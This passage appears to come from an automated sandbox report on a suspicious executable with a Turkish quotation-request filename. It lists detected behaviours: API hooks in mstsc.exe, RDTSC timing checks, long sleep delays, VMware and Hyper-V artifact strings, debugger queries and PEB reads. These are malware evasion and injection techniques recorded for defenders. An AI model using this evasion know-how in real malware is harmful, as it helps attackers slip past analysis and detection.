          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7AD324
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7B0774
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7AD944
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7AD504
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7AD544
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7AD1E4
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7B0154
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7AD8A4
          Source: C:\Windows\SysWOW64\mstsc.exe | API/Special instruction interceptor: Address: 7FFBCB7ADA44
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 29B9904 second address: 29B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exe | RDTSC instruction interceptor: First address: 29B9B7E second address: 29B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: 2EF0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: 3180000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: 3080000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: 9910000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: A910000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: AB30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: BB30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: C1F0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: D1F0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Memory allocated: E1F0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5863
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3873
          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 9730
          Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 876
          Source: C:\Windows\SysWOW64\mstsc.exe | Window / User API: threadDelayed 1074
          Source: C:\Windows\SysWOW64\mstsc.exe | Window / User API: threadDelayed 8898
          Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_6-13826
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\mstsc.exe | API coverage: 0.4 %
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe TID: 2832 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4360 | Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1816 | Thread sleep count: 9730 > 30
          Source: C:\Windows\explorer.exe TID: 1816 | Thread sleep time: -19460000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1816 | Thread sleep count: 212 > 30
          Source: C:\Windows\explorer.exe TID: 1816 | Thread sleep time: -424000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700 | Thread sleep count: 1074 > 30
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700 | Thread sleep time: -2148000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700 | Thread sleep count: 8898 > 30
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 3700 | Thread sleep time: -17796000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007D26C7 PathFindFileNameW,PathAppendW,GetFileAttributesW,PathAppendW,FindFirstFileW,PathAppendW,PathAppendW,FindNextFileW,FindClose, 8_2_007D26C7
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007F80BE GetSystemInfo, 8_2_007F80BE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00=
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000002.2817331144.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000002.2817331144.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1569063480.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000002.2817331144.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.1558305296.0000000000A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.1569063480.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_00409AB0 rdtsc 4_2_00409AB0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_0040ACF0 LdrLoadDll, 4_2_0040ACF0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_007FF581 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 8_2_007FF581
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 8_2_0087B05F LoadLibraryW,GetProcAddress,memset,FreeLibrary, 8_2_0087B05F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01C061C3 mov eax, dword ptr fs:[00000030h] 4_2_01C061C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01C061C3 mov eax, dword ptr fs:[00000030h] 4_2_01C061C3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h] 4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h] 4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h] 4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC019F mov eax, dword ptr fs:[00000030h] 4_2_01BC019F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3A197 mov eax, dword ptr fs:[00000030h] 4_2_01B3A197
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3A197 mov eax, dword ptr fs:[00000030h] 4_2_01B3A197
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3A197 mov eax, dword ptr fs:[00000030h] 4_2_01B3A197
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01C161E5 mov eax, dword ptr fs:[00000030h] 4_2_01C161E5
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BFC188 mov eax, dword ptr fs:[00000030h] 4_2_01BFC188
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BFC188 mov eax, dword ptr fs:[00000030h] 4_2_01BFC188
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B80185 mov eax, dword ptr fs:[00000030h] 4_2_01B80185
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE4180 mov eax, dword ptr fs:[00000030h] 4_2_01BE4180
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE4180 mov eax, dword ptr fs:[00000030h] 4_2_01BE4180
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B701F8 mov eax, dword ptr fs:[00000030h] 4_2_01B701F8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h] 4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h] 4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BBE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h] 4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BBE1D0 mov eax, dword ptr fs:[00000030h] 4_2_01BBE1D0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B70124 mov eax, dword ptr fs:[00000030h] 4_2_01B70124
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEA118 mov ecx, dword ptr fs:[00000030h] 4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEA118 mov eax, dword ptr fs:[00000030h] 4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEA118 mov eax, dword ptr fs:[00000030h] 4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEA118 mov eax, dword ptr fs:[00000030h] 4_2_01BEA118
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov eax, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BEE10E mov ecx, dword ptr fs:[00000030h] 4_2_01BEE10E
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01C00115 mov eax, dword ptr fs:[00000030h] 4_2_01C00115
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B46154 mov eax, dword ptr fs:[00000030h] 4_2_01B46154
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B46154 mov eax, dword ptr fs:[00000030h] 4_2_01B46154
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3C156 mov eax, dword ptr fs:[00000030h] 4_2_01B3C156
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD8158 mov eax, dword ptr fs:[00000030h] 4_2_01BD8158
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h] 4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h] 4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD4144 mov ecx, dword ptr fs:[00000030h] 4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h] 4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD4144 mov eax, dword ptr fs:[00000030h] 4_2_01BD4144
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD80A8 mov eax, dword ptr fs:[00000030h] 4_2_01BD80A8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B4208A mov eax, dword ptr fs:[00000030h] 4_2_01B4208A
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3C0F0 mov eax, dword ptr fs:[00000030h] 4_2_01B3C0F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B820F0 mov ecx, dword ptr fs:[00000030h] 4_2_01B820F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_01B3A0E3
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC60E0 mov eax, dword ptr fs:[00000030h] 4_2_01BC60E0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B480E9 mov eax, dword ptr fs:[00000030h] 4_2_01B480E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC20DE mov eax, dword ptr fs:[00000030h] 4_2_01BC20DE
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01C060B8 mov eax, dword ptr fs:[00000030h] 4_2_01C060B8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01C060B8 mov ecx, dword ptr fs:[00000030h] 4_2_01C060B8
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BD6030 mov eax, dword ptr fs:[00000030h] 4_2_01BD6030
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3A020 mov eax, dword ptr fs:[00000030h] 4_2_01B3A020
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3C020 mov eax, dword ptr fs:[00000030h] 4_2_01B3C020
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h] 4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h] 4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h] 4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B5E016 mov eax, dword ptr fs:[00000030h] 4_2_01B5E016
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC4000 mov ecx, dword ptr fs:[00000030h] 4_2_01BC4000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BE2000 mov eax, dword ptr fs:[00000030h] 4_2_01BE2000
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B6C073 mov eax, dword ptr fs:[00000030h] 4_2_01B6C073
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B42050 mov eax, dword ptr fs:[00000030h] 4_2_01B42050
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01BC6050 mov eax, dword ptr fs:[00000030h] 4_2_01BC6050
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B38397 mov eax, dword ptr fs:[00000030h] 4_2_01B38397
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B38397 mov eax, dword ptr fs:[00000030h] 4_2_01B38397
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B38397 mov eax, dword ptr fs:[00000030h] 4_2_01B38397
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B6438F mov eax, dword ptr fs:[00000030h] 4_2_01B6438F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B6438F mov eax, dword ptr fs:[00000030h] 4_2_01B6438F
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3E388 mov eax, dword ptr fs:[00000030h] 4_2_01B3E388
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3E388 mov eax, dword ptr fs:[00000030h] 4_2_01B3E388
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B3E388 mov eax, dword ptr fs:[00000030h] 4_2_01B3E388
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B5E3F0 mov eax, dword ptr fs:[00000030h] 4_2_01B5E3F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B5E3F0 mov eax, dword ptr fs:[00000030h] 4_2_01B5E3F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B5E3F0 mov eax, dword ptr fs:[00000030h] 4_2_01B5E3F0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B763FF mov eax, dword ptr fs:[00000030h] 4_2_01B763FF
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exe | Code function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h] 4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B503E9 mov eax, dword ptr fs:[00000030h]4_2_01B503E9
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov eax, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov eax, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov ecx, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BEE3DB mov eax, dword ptr fs:[00000030h]4_2_01BEE3DB
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE43D4 mov eax, dword ptr fs:[00000030h]4_2_01BE43D4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE43D4 mov eax, dword ptr fs:[00000030h]4_2_01BE43D4
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BFC3CD mov eax, dword ptr fs:[00000030h]4_2_01BFC3CD
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B4A3C0 mov eax, dword ptr fs:[00000030h]4_2_01B4A3C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B483C0 mov eax, dword ptr fs:[00000030h]4_2_01B483C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC63C0 mov eax, dword ptr fs:[00000030h]4_2_01BC63C0
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01C0A352 mov eax, dword ptr fs:[00000030h]4_2_01C0A352
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B3C310 mov ecx, dword ptr fs:[00000030h]4_2_01B3C310
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B60310 mov ecx, dword ptr fs:[00000030h]4_2_01B60310
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A30B mov eax, dword ptr fs:[00000030h]4_2_01B7A30B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A30B mov eax, dword ptr fs:[00000030h]4_2_01B7A30B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01B7A30B mov eax, dword ptr fs:[00000030h]4_2_01B7A30B
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BE437C mov eax, dword ptr fs:[00000030h]4_2_01BE437C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov ecx, dword ptr fs:[00000030h]4_2_01BC035C
          Source: C:\Users\user\Desktop\TEKL#U0130F #U0130ST.exeCode function: 4_2_01BC035C mov eax, dword ptr fs:[00000030h]4_2_01BC035C
